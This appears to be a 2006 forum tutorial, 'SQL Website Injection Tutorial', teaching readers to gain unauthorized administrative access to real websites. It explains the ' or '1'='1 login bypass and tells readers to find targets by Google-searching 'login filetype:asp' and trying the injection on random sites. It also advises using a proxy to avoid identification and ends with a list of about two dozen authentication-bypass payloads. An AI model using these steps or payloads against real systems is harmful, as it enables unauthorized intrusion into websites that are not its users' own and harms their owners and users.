February 20, 2006

  • SQL Website Injection Tutorial


    Easy way to gain administrative access on a website
    By Citizin

    This is a simple tutorial, will tell you just what to do, and how it works, lets get to reading, eh?

    Step 1 - What to do exactly
    Lets understand what were going to do.

    You need a line of text/code that is true, and what do I mean by true?

    Quote:
     
    '1' =  '1'


    Thats true, 1 = 1 is true.
    How do we use that to our advantage?
    Well lets see here.

    What does a username and password always check for?
    Username:Justin
    Password:PinkPanther

    When you login, it checks if Justin's Password equals Pinkpanther, well
    something is already true in the line 1 = 1, so thats all we really
    need. Theres lots of other injections you can make, so be creative,
    this one might not work on some websites as others do, for a list of
    other injections read the bottom of the tutorial.

    Now to continue.
    The formatting is similar to this:

    Quote:
    "SELECT * FROM tblUser WHERE UserName = 'user' AND Password = 'pass';"

    So when you type ' or '1' = '1 it looks like:

    Quote:
    "SELECT * FROM tblUser WHERE UserName = '' or '1' = '1' AND Password = '' or '1' = '1';"

    Step 2 - So I understand how it works, how to get logins?

    Well, google is one of the top search engines, but works as more
    than a search engine, lets take a closer look at how we can find ASP
    Logins with google.

    1. Go to Google.com
    2. Type "login filetype:asp"
    3. Click on a link and type in the injection for username and password
    4. If Successfull you'll have admin cp
    5. If not return to #2 and try a diffrent link

    See, now the problem is a lot of these are going to get hit, so I
    suggest you start on page 15, a lot may not work, a lot may, so don't
    give up cause the first 10 didn't work, I also suggest using a proxy, I
    got a email from some website saying that they were going to sue, some
    bullshit, but I was under a proxy and I tagged the site with my email,
    so thats the only think they have of mine, some webmasters my take this
    seriously, so be carefull.

    Other Injections
    Here they be:

    Code:
                        admin'-- 
                        
                        ' or 0=0 -- 
                        
                        " or 0=0 -- 
                        
                        or 0=0 -- 
                        
                        ' or 0=0 # 
                        
                        " or 0=0 # 
                        
                        or 0=0 # 
                        
                        ' or 'x'='x 
                        
                        " or "x"="x 
                        
                        ') or ('x'='x 
                        
                        ' or 1=1-- 
                        
                        " or 1=1-- 
                        
                        or 1=1-- 
                        
                        ' or a=a-- 
                        
                        " or "a"="a 
                        
                        ') or ('a'='a 
                        
                        ") or ("a"="a 
                        
                        hi" or "a"="a 
                        
                        hi" or 1=1 -- 
                        
                        hi' or 1=1 -- 
                        
                        hi' or 'a'='a 
                        
                        hi') or ('a'='a 
                        
                        hi") or ("a"="a

    Other Sql Injections thanks to ComSec Of GovermentSecurity.

    I hope this all helped you, I suggest reading up on injection to understand it a bit more.

    -Citizin

    www.gamerzplanet.net